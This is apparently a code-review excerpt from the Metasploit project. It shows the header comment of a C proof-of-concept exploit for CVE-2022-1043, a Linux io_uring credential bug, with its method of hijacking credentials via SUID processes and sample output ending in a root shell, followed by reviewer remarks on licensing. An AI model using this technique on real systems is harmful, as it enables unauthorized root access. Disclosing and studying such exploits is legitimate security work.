data/exploits/CVE-2022-1043/cve-2022-1043.c

```diff
@@ -0,0 +1,475 @@
+/* PoC for CVE-2022-1043, a bug in io_uring leading to an additional put_cred()
+ * that can be exploited to hijack credentials of other processes.
+ *
+ * We spawn SUID programs to get the free'd cred object reallocated by a
+ * privileged process and abuse them to create a SUID root binary ourselves
+ * that'll pop a shell.
+ *
+ * The dangling cred pointer will, however, lead to a kernel panic as soon as
+ * the task terminates and its credentials are destroyed. We therefore detach
+ * from the controlling terminal, block all signals and rest in silence until
+ * the system shuts down and we get killed hard, just to cry in vain, seeing
+ * the kernel collapse.
+ *
+ * The bug affected kernels from v5.12-rc3 to v5.14-rc7 and has been fixed by
+ * commit a30f895ad323 ("io_uring: fix xa_alloc_cycle() error return value
+ * check").
+ *
+ * user@box:~$ gcc -pthread cve-2022-1043.c -o cve-2022-1043
+ * user@box:~$ ./cve-2022-1043
+ * [~] forking helper process...
+ * [~] creating worker threads...
+ * [~] ID wrapped after 65536 allocation attempts! (id = 1)
+ * [~] ID wrapped again after 131071 allocation attempts! (id = 1)
+ * [~] waiting for creds to get reallocated...
+ * [.] reused by uninteresting EUID -16843010 (PaX MEMORY_SANITIZE?)
+ * [.] reused by uninteresting EUID 1000
+ * [*] waiting for root shell...
+ * # id
+ * uid=0(root) gid=0(root) groups=0(root),1000(user)
+ *
+ * (c) 2022 Open Source Security, Inc.
+ *
+ * - minipli
+ *
+ *  This program is free software; you can redistribute it and/or modify
+ *  it under the terms of the GNU General Public License as published by
+ *  the Free Software Foundation; either version 2 of the License, or
+ *  (at your option) any later version.
```

Comment:
Same question as before about the license 👀

Reply:
Yes ^ same applies here, adding for visibility: https://github.com/rapid7/metasploit-framework/pull/17300/files#r1037454131